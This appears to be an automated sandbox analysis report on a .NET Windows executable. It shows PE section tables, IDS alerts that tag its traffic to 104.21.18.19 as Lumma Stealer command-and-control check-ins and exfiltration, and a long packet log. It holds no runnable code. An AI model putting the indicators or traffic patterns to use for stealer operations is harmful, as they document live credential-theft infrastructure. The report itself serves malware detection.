                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x4fb20x4f.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x58c.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x4f280x38.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x20000x300c0x3200f27795b54e7ea13f5bbe92ccf4dd102eFalse0.478203125data5.308111270156275IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rsrc0x60000x58c0x6006e993d30dd12afeefbd7de5ec6984ff1False0.412109375data4.002562964288917IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .reloc0x80000xc0x200a94e9107db21028df50d68392e82c4ffFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_VERSION0x60900x2fcdata0.43586387434554974
                                                                                                                RT_MANIFEST0x639c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                DLLImport
                                                                                                                mscoree.dll_CorExeMain
                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-12-30T11:59:39.044317+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.18.19443TCP
                                                                                                                2024-12-30T11:59:39.509278+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449732104.21.18.19443TCP
                                                                                                                2024-12-30T11:59:39.509278+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732104.21.18.19443TCP
                                                                                                                2024-12-30T11:59:39.955988+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.18.19443TCP
                                                                                                                2024-12-30T11:59:40.414271+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449733104.21.18.19443TCP
                                                                                                                2024-12-30T11:59:40.414271+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733104.21.18.19443TCP
                                                                                                                2024-12-30T11:59:41.382705+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.18.19443TCP
                                                                                                                2024-12-30T11:59:42.507623+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.18.19443TCP
                                                                                                                2024-12-30T11:59:43.769545+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.18.19443TCP
                                                                                                                2024-12-30T11:59:45.317754+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.18.19443TCP
                                                                                                                2024-12-30T11:59:56.966943+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449743104.21.18.19443TCP
                                                                                                                2024-12-30T11:59:57.871611+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.18.19443TCP
                                                                                                                2024-12-30T11:59:57.922786+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449744104.21.18.19443TCP
                                                                                                                2024-12-30T11:59:59.961086+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745104.21.18.19443TCP
                                                                                                                2024-12-30T12:00:00.427219+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449745104.21.18.19443TCP
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 30, 2024 11:59:35.224191904 CET49730443192.168.2.4140.82.121.4
                                                                                                                Dec 30, 2024 11:59:35.224219084 CET44349730140.82.121.4192.168.2.4
                                                                                                                Dec 30, 2024 11:59:35.224282980 CET49730443192.168.2.4140.82.121.4
                                                                                                                Dec 30, 2024 11:59:35.249867916 CET49730443192.168.2.4140.82.121.4
                                                                                                                Dec 30, 2024 11:59:35.249881983 CET44349730140.82.121.4192.168.2.4
                                                                                                                Dec 30, 2024 11:59:35.867084026 CET44349730140.82.121.4192.168.2.4
                                                                                                                Dec 30, 2024 11:59:35.867156029 CET49730443192.168.2.4140.82.121.4
                                                                                                                Dec 30, 2024 11:59:35.870848894 CET49730443192.168.2.4140.82.121.4
                                                                                                                Dec 30, 2024 11:59:35.870858908 CET44349730140.82.121.4192.168.2.4
                                                                                                                Dec 30, 2024 11:59:35.871093035 CET44349730140.82.121.4192.168.2.4
                                                                                                                Dec 30, 2024 11:59:35.914887905 CET49730443192.168.2.4140.82.121.4
                                                                                                                Dec 30, 2024 11:59:35.955332994 CET44349730140.82.121.4192.168.2.4
                                                                                                                Dec 30, 2024 11:59:36.386710882 CET44349730140.82.121.4192.168.2.4
                                                                                                                Dec 30, 2024 11:59:36.386801004 CET44349730140.82.121.4192.168.2.4
                                                                                                                Dec 30, 2024 11:59:36.386858940 CET49730443192.168.2.4140.82.121.4
                                                                                                                Dec 30, 2024 11:59:36.386873960 CET44349730140.82.121.4192.168.2.4
                                                                                                                Dec 30, 2024 11:59:36.386917114 CET49730443192.168.2.4140.82.121.4
                                                                                                                Dec 30, 2024 11:59:36.393651009 CET49730443192.168.2.4140.82.121.4
                                                                                                                Dec 30, 2024 11:59:36.402988911 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:36.403054953 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:36.403146982 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:36.403538942 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:36.403557062 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:36.883898020 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:36.884027004 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:36.887250900 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:36.887268066 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:36.887569904 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:36.889919043 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:36.931358099 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.089418888 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.089651108 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.089741945 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.089780092 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.089901924 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.089997053 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.090040922 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.090059042 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.090096951 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.097208023 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.097451925 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.097513914 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.097527981 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.097557068 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.097783089 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.097839117 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.097858906 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.097907066 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.105019093 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.150913000 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.177802086 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.178139925 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.178208113 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.178227901 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.178344965 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.178401947 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.178411007 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.178966045 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.179022074 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.179030895 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.179824114 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.179903984 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.179912090 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.180015087 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.180079937 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.180088997 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.180676937 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.180730104 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.180738926 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.185616970 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.185674906 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.185684919 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.185797930 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.185848951 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.185859919 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.186456919 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.186513901 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.186523914 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.186634064 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.186717033 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.186723948 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.186747074 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.186785936 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.186821938 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.229051113 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.229083061 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.267651081 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.267676115 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.267693043 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.267699957 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.267704964 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.267741919 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.267762899 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.267788887 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.267812967 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.269355059 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.269391060 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.269402981 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.269418955 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.269426107 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.269453049 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.269457102 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.269469976 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.275096893 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.275110960 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.275304079 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.275321960 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.281559944 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.281577110 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.281644106 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.281656027 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.322784901 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.363965988 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.363981962 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364101887 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.364123106 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364187002 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.364245892 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364280939 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364310026 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.364319086 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364346027 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.364368916 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.364526033 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364541054 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364593029 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.364600897 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364615917 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364634037 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364635944 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.364646912 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.364665985 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.364706993 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.365983009 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.365997076 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.366049051 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.366058111 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.366096973 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.372253895 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.372271061 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.372327089 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.372335911 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.372374058 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.443057060 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.443073034 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.443393946 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.443423033 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.443495035 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.443866968 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.443881989 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.444061995 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.444072962 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.444129944 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.444287062 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.444300890 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.444355965 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.444364071 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.444415092 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.450280905 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.450297117 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.450354099 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.450362921 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.450406075 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.450930119 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.450982094 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.451005936 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.451014996 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.451040030 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.451064110 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.451560020 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.451575041 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.451634884 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.451643944 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.451692104 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.452155113 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.452191114 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.452212095 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.452219009 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.452236891 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.452264071 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.458281040 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.458327055 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.458348989 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.458359957 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.458379984 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.458403111 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.531593084 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.531610966 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.531677008 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.531693935 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.531744957 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.532146931 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.532164097 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.532219887 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.532229900 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.532278061 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.532723904 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.532738924 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.532790899 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.532799006 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.532814026 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.532839060 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.539005995 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.539021969 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.539072990 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.539082050 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.539119959 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.539279938 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.539295912 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.539341927 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.539350033 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.539390087 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.539771080 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.539788008 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.539839029 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.539845943 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.539890051 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.540168047 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.540209055 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.540226936 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.540237904 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.540256977 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.540280104 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.546725988 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.546762943 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.546827078 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.546838999 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.546885967 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.619944096 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.620002031 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.620034933 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.620049000 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.620074987 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.620110989 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.620323896 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.620337963 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.620393038 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.620400906 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.620440960 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.620865107 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.620878935 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.620938063 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.620946884 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.620985985 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.627103090 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.627118111 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.627171993 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.627182007 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.627222061 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.627671957 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.627686977 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.627743006 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.627756119 CET44349731185.199.110.133192.168.2.4
                                                                                                                Dec 30, 2024 11:59:37.627791882 CET49731443192.168.2.4185.199.110.133
                                                                                                                Dec 30, 2024 11:59:37.628099918 CET44349731185.199.110.133192.168.2.4
